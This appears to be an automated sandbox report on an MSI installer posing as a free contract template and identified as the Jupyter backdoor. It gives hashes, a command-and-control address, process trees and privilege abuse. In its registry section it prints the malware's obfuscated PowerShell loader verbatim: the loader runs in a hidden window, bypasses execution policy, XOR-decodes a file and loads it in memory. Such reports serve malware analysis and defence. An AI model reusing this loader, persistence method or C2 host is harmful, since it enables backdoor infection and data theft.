Analysis
-
max time kernel
147s -
max time network
161s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
05/04/2024, 09:28
Static task
static1
Behavioral task
behavioral1
Sample
Free-Business-Partner-Contract-Template.msi
Resource
win7-20240221-en
General
-
Target
Free-Business-Partner-Contract-Template.msi
-
Size
109.5MB
-
MD5
44d70c2dd1cdcfc30df95a6b676dc326
-
SHA1
93846f239ecf71c1a8e067f880070a814868060b
-
SHA256
0adfbce8a09d9f977e5fe90ccefc9612d1d742d980fe8dc889e10a5778592e4d
-
SHA512
108cd1b9cb1fd387d20a06edc0be0e3e00ffc3b2dfe4d5dd636cd642072fa740311824dbdd1b403d8b650fc57d450dbae324ef2e22bed67f5467b6b4095aa80d
-
SSDEEP
98304:TYsfUbJeGKExXADDHY2P9m6E1tsg/qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqm:TfUdD3xwXHY206y4LY
Malware Config
Extracted
jupyter
SP-17
http://188.241.83.61
Signatures
-
Jupyter Backdoor/Client payload 1 IoCs
resource yara_rule behavioral2/memory/3504-430-0x0000000006FC0000-0x0000000006FD0000-memory.dmp family_jupyter -
Blocklisted process makes network request 9 IoCs
flow pid Process 2 2500 msiexec.exe 4 2500 msiexec.exe 6 2500 msiexec.exe 7 2500 msiexec.exe 12 2500 msiexec.exe 13 2500 msiexec.exe 58 3504 powershell.exe 60 3504 powershell.exe 66 3504 powershell.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\MICRosOFt\WindOWs\starT MenU\PrOGraMs\StarTUp\adcc9dfe6094379d72a08c2746d24.lNk powershell.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\R: msiexec.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Executes dropped EXE 2 IoCs
pid Process 2748 MSI54F2.tmp 876 MSI54F2.tmp -
Loads dropped DLL 12 IoCs
pid Process 3484 MsiExec.exe 3484 MsiExec.exe 876 MSI54F2.tmp 876 MSI54F2.tmp 876 MSI54F2.tmp 876 MSI54F2.tmp 876 MSI54F2.tmp 876 MSI54F2.tmp 876 MSI54F2.tmp 876 MSI54F2.tmp 876 MSI54F2.tmp 876 MSI54F2.tmp -
Modifies registry class 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\nkjbfwojwpmgzbfa\shell\open\command\ = "pOWerShEll -wINDoWStYLe hIDDEN -eP BypasS -comMand \"$a7997fcd41e4a3b768a6bf953e6cc='QHJTM01eTkBtP0B8S3M2Xm81WUpAUzImMUB7Nk9oXlBqKGhAcjl3OV4wS09mQHZnWHVAd0teKUB0JV5QXlBqZXhAVU19Y0B1LUg3QFY+ZDBeMHVfUS0/O0ZzdyFpWVVxQE1Ad2tZbkB3fmpHPlg0ZkFnU0BFb3NHKitvbVotaC1rQ1REKG9QZVY2bld2UVN4fllmamdOKld6eHhlT3luZWVga3JTcTFkd2VxeChqUGpEQnFWbHgwal97a2p5entTdmxKS2pLeEFCXnJoVnpHIW9BWiYwelc=';$a77abf52b7d407808df1ba9745490=[sySTEm.IO.filE]::rEAdALLbytES('C:\\Users\\Admin\\AppData\\Roaming\\mIcROSoFt\\ymnRBsGpToiEJ\\ZYdwuyGcDBmv.HIElYwUciBJNXvnG');fOr($aa9ae30d8304f0b78e86582ea3b85=0;$aa9ae30d8304f0b78e86582ea3b85 -Lt $a77abf52b7d407808df1ba9745490.COUNT;){FOr($a439a9ddd664bfbdee23d2c082e8b=0;$a439a9ddd664bfbdee23d2c082e8b -lT $a7997fcd41e4a3b768a6bf953e6cc.lEnGtH;$a439a9ddd664bfbdee23d2c082e8b++){$a77abf52b7d407808df1ba9745490[$aa9ae30d8304f0b78e86582ea3b85]=$a77abf52b7d407808df1ba9745490[$aa9ae30d8304f0b78e86582ea3b85] -BXoR $a7997fcd41e4a3b768a6bf953e6cc[$a439a9ddd664bfbdee23d2c082e8b];$aa9ae30d8304f0b78e86582ea3b85++;IF($aa9ae30d8304f0b78e86582ea3b85 -ge $a77abf52b7d407808df1ba9745490.cOuNT){$a439a9ddd664bfbdee23d2c082e8b=$a7997fcd41e4a3b768a6bf953e6cc.LengTH}}};[SYSTem.ReFlectIOn.aSsEmbLY]::loaD($a77abf52b7d407808df1ba9745490);[aa1d6f4e60d4f0b9a10f9031f4877.af35bb34041454ba3d18c1a462992]::a2be604cdf64df868f7a43ea5911b()\"" powershell.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\.qnbdeaowdplgsjacwc powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\.qnbdeaowdplgsjacwc\ = "nkjbfwojwpmgzbfa" powershell.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\nkjbfwojwpmgzbfa\shell\open\command powershell.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\nkjbfwojwpmgzbfa powershell.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\nkjbfwojwpmgzbfa\shell powershell.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\nkjbfwojwpmgzbfa\shell\open powershell.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 3504 powershell.exe 3504 powershell.exe 3504 powershell.exe 3504 powershell.exe 3504 powershell.exe 3504 powershell.exe 3504 powershell.exe 3504 powershell.exe 3504 powershell.exe 3504 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2500 msiexec.exe Token: SeIncreaseQuotaPrivilege 2500 msiexec.exe Token: SeSecurityPrivilege 1416 msiexec.exe Token: SeCreateTokenPrivilege 2500 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2500 msiexec.exe Token: SeLockMemoryPrivilege 2500 msiexec.exe Token: SeIncreaseQuotaPrivilege 2500 msiexec.exe Token: SeMachineAccountPrivilege 2500 msiexec.exe Token: SeTcbPrivilege 2500 msiexec.exe Token: SeSecurityPrivilege 2500 msiexec.exe Token: SeTakeOwnershipPrivilege 2500 msiexec.exe Token: SeLoadDriverPrivilege 2500 msiexec.exe Token: SeSystemProfilePrivilege 2500 msiexec.exe Token: SeSystemtimePrivilege 2500 msiexec.exe Token: SeProfSingleProcessPrivilege 2500 msiexec.exe Token: SeIncBasePriorityPrivilege 2500 msiexec.exe Token: SeCreatePagefilePrivilege 2500 msiexec.exe Token: SeCreatePermanentPrivilege 2500 msiexec.exe Token: SeBackupPrivilege 2500 msiexec.exe Token: SeRestorePrivilege 2500 msiexec.exe Token: SeShutdownPrivilege 2500 msiexec.exe Token: SeDebugPrivilege 2500 msiexec.exe Token: SeAuditPrivilege 2500 msiexec.exe Token: SeSystemEnvironmentPrivilege 2500 msiexec.exe Token: SeChangeNotifyPrivilege 2500 msiexec.exe Token: SeRemoteShutdownPrivilege 2500 msiexec.exe Token: SeUndockPrivilege 2500 msiexec.exe Token: SeSyncAgentPrivilege 2500 msiexec.exe Token: SeEnableDelegationPrivilege 2500 msiexec.exe Token: SeManageVolumePrivilege 2500 msiexec.exe Token: SeImpersonatePrivilege 2500 msiexec.exe Token: SeCreateGlobalPrivilege 2500 msiexec.exe Token: SeCreateTokenPrivilege 2500 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2500 msiexec.exe Token: SeLockMemoryPrivilege 2500 msiexec.exe Token: SeIncreaseQuotaPrivilege 2500 msiexec.exe Token: SeMachineAccountPrivilege 2500 msiexec.exe Token: SeTcbPrivilege 2500 msiexec.exe Token: SeSecurityPrivilege 2500 msiexec.exe Token: SeTakeOwnershipPrivilege 2500 msiexec.exe Token: SeLoadDriverPrivilege 2500 msiexec.exe Token: SeSystemProfilePrivilege 2500 msiexec.exe Token: SeSystemtimePrivilege 2500 msiexec.exe Token: SeProfSingleProcessPrivilege 2500 msiexec.exe Token: SeIncBasePriorityPrivilege 2500 msiexec.exe Token: SeCreatePagefilePrivilege 2500 msiexec.exe Token: SeCreatePermanentPrivilege 2500 msiexec.exe Token: SeBackupPrivilege 2500 msiexec.exe Token: SeRestorePrivilege 2500 msiexec.exe Token: SeShutdownPrivilege 2500 msiexec.exe Token: SeDebugPrivilege 2500 msiexec.exe Token: SeAuditPrivilege 2500 msiexec.exe Token: SeSystemEnvironmentPrivilege 2500 msiexec.exe Token: SeChangeNotifyPrivilege 2500 msiexec.exe Token: SeRemoteShutdownPrivilege 2500 msiexec.exe Token: SeUndockPrivilege 2500 msiexec.exe Token: SeSyncAgentPrivilege 2500 msiexec.exe Token: SeEnableDelegationPrivilege 2500 msiexec.exe Token: SeManageVolumePrivilege 2500 msiexec.exe Token: SeImpersonatePrivilege 2500 msiexec.exe Token: SeCreateGlobalPrivilege 2500 msiexec.exe Token: SeCreateTokenPrivilege 2500 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2500 msiexec.exe Token: SeLockMemoryPrivilege 2500 msiexec.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2500 msiexec.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1416 wrote to memory of 3484 1416 msiexec.exe 98 PID 1416 wrote to memory of 3484 1416 msiexec.exe 98 PID 1416 wrote to memory of 3484 1416 msiexec.exe 98 PID 2500 wrote to memory of 2748 2500 msiexec.exe 99 PID 2500 wrote to memory of 2748 2500 msiexec.exe 99 PID 2500 wrote to memory of 2748 2500 msiexec.exe 99 PID 3484 wrote to memory of 3504 3484 MsiExec.exe 100 PID 3484 wrote to memory of 3504 3484 MsiExec.exe 100 PID 3484 wrote to memory of 3504 3484 MsiExec.exe 100 PID 2748 wrote to memory of 876 2748 MSI54F2.tmp 102 PID 2748 wrote to memory of 876 2748 MSI54F2.tmp 102 PID 2748 wrote to memory of 876 2748 MSI54F2.tmp 102
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Free-Business-Partner-Contract-Template.msi1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Users\Admin\AppData\Local\Temp\MSI54F2.tmp"C:\Users\Admin\AppData\Local\Temp\MSI54F2.tmp"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\Temp\{358C4BE3-50B0-4DCB-BD05-A202816A65FF}\.cr\MSI54F2.tmp"C:\Windows\Temp\{358C4BE3-50B0-4DCB-BD05-A202816A65FF}\.cr\MSI54F2.tmp" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\MSI54F2.tmp" -burn.filehandle.attached=536 -burn.filehandle.self=5563⤵
- Executes dropped EXE
- Loads dropped DLL
PID:876
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0B0F578F5F72FE0EE3BE59FBB9A5AA02 C2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss562D.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi55DB.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr55DC.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr561C.txt" -propSep " :<->: " -testPrefix "_testValue."3⤵
- Blocklisted process makes network request
- Drops startup file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3504
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4044 --field-trial-handle=2744,i,16362475727591565961,3676688664819797550,262144 --variations-seed-version /prefetch:81⤵PID:5072
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
392KB
MD507ce413b1af6342187514871dc112c74
SHA18008f8bfeae99918b6323a3d1270dea63b3a8394
SHA2560ba7e90fe2a0005e1e0dad53e2678916650c3b95ff9b666b802d128276c8ec46
SHA51227df52bfcbc2d0ce3756a2526e632b5610d7047259b31aeeff12652de3e046bcd239e39c222a323654f475f1f913679b4fdd858303e0e105f7a300b6f6ed0fe5
-
Filesize
1.4MB
MD5044a5d8e2f1356de889aedb11fdcc679
SHA14e8416eb12d209509d49998ebe714612709eb4d6
SHA256e4492ccb97078cc32ee4437404ce04f4404884800a81fb34243d0a64936f82d7
SHA5123cb6beaf46ec6ca3aa5a645b51b1df7a26826d8e65eb8f6cd1be63488f7a372c1e7e266f2950489a3ae8b3c6ca60d72f25504e4942e096c5c2045177557c79b9
-
Filesize
570KB
MD5c26c68e4a79fd2629714b17514411c40
SHA100138d8edea0918c4476da303415be399cf704c6
SHA25655434961c0b4bed88ae6bfe6e0e61a3a3dcc392858f0e53c6c14c272200203ed
SHA5126fc8028e6e52b6c9e74ac3ea6d19ed750047d46b7e4021d46e581b58367ffc11fb13b696dfa30a15305e94098a7fd12051ee37d32df91ef2ae1e2d9c642b02ea
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
5KB
MD50c95bc11cfca37f84a19de0529377e13
SHA141f409dbbab04ef35c4f6489af6f85fceb9c501a
SHA25688748aae11029228d84aef0855f4bc084dfd70450db1f7029746d8bc85182f93
SHA5128a52f3c40440e3129a367609ee4b6e9e98aa62edec48592be03bad1aadcd389e2e58e095f4ea3d6f9cb458aa7101fcb5afdff66658885bfa0634c74c086db568
-
Filesize
118KB
MD5dac33a6ccbcb047e268c2b4d8683d458
SHA10975b054358bd83656011e3f9e1e7790b5f26c07
SHA256c05e705645b1e77256f93b4ae93a12a3adbd7433f7b8f1c68fa84ea1c0838a77
SHA5121c1692ee65c6bcb86d0093040adbb935522a875a32207b345f9375f6c40bc90225963302cf157921d9d4b60f54776f3b2c52bc63bbdd911bd438a832248484fe
-
Filesize
752B
MD5efe91fd0b4eb17cc897621c133c53ade
SHA1c28fa3c594cc6d2ce8fad00f2d1d2c09b220ce74
SHA25677d45ae9bda3349bbcbf2069503835c3bbb37fed0c1e2311b4c3e3bb26640940
SHA512034043d96e709795852918fdac7606918453df59660a01af25dbbc844c98c7ec28bb7f0a1764d2148c83ec6b0e94e8e8317e9610f1c9bb1fe055b65fcace0549
-
Filesize
80KB
MD5c4f7146ddc56763ccdb1cb3c09478708
SHA1bca088ab33cfb69adeae11a272e9c8a83f39a8c9
SHA256886cb2a994461f091752fc7b21e3143c212efd8841c757909e74ac32761880da
SHA512df2ca029e95f80fc5870e541db8b1d5a03266307bb5f7680ad630868a9a3c584b3a702fbec09c26fef7287c99f5d9d1f59cd59b74dcf740c9a8e7508e07d18b5
-
Filesize
27KB
MD51e40431b501d55fe8ba59cabb3ce5c17
SHA1b8aef0f6829345d844960c3eaf96c41f76142f6c
SHA25692ef1bdf8c8140e34e5ae1eb8d9b7afba9921e5ada6317c6cdd0da2712f7e000
SHA5122ab5d887e717add46959a7193cbf1dbf73f2792130025e5712ae76058ce5923be8afdf3ed8d11ea6859b13126f88bb9e1099741c799ca90e3f7713955dd9638d
-
Filesize
363KB
MD56726d4b46346ef40dd3ea4376ae7d259
SHA1ffdaa10e1e3d1c7d7411f799a0889ce66014bc29
SHA2563e96b189fa7a160396742cdc93564dfce3ad3993a3e21118cf9114c8cb45e963
SHA512cd2a68f1ce4bc161b26466fa8f472803d7a10b339dff6c599e64863236ef59d9a0ed1b2f4168f8557b35d81d92edccdfd9d313096a88415838b6351af1ae249a
-
Filesize
16KB
MD5ad69d408b05b98180b25d23b0a790f01
SHA15fdbdae2979685db500d2b031e2a430ce16e592e
SHA25614090b63240c63bfe118a24b6f0112095f331ac46819f6f4ab62d8e9bbe4c646
SHA51212323f7190fd785277965996cffe141a5b2d5b11679961db6aa6744b8157df7f9bd7b5b935d3ca2a7e0be7ca5f0f60fd8885b94ae7cd70aea1572e90a2599eac
-
Filesize
111KB
MD5d7c697ceb6f40ce91dabfcbe8df08e22
SHA149cd0213a1655dcdb493668083ab2d7f55135381
SHA256b925d9d3e1e2c49bf05a1b0713e2750ee6e0c43c7adc9d3c3a1b9fb8c557c3df
SHA51222ca87979ca68f10b5fda64c27913d0f2a12c359b04e4a6caa3645303fbd47cd598c805fd9a43c8f3e0934e9d2db85f7a4e1eff26cb33d233efc05ee2613cfc1
-
Filesize
541KB
MD5aed8280e90f672f631d2aedebd6452bf
SHA1390b96ce6b4b1a47c12d8932c5e8da6e51fdd38a
SHA256a82332e0a9c9cee34f9a46d5e984901fa57a011f54e7b37b9716acf834746ced
SHA51223a223fc4da00038ff6b584f0a2a4186f49eaf4d8cb28dfdfa795048a4a977aa39848cb83bbfd8f0555412fd04c802b122267266e33a5ddc49d3e0ff1e2eca4f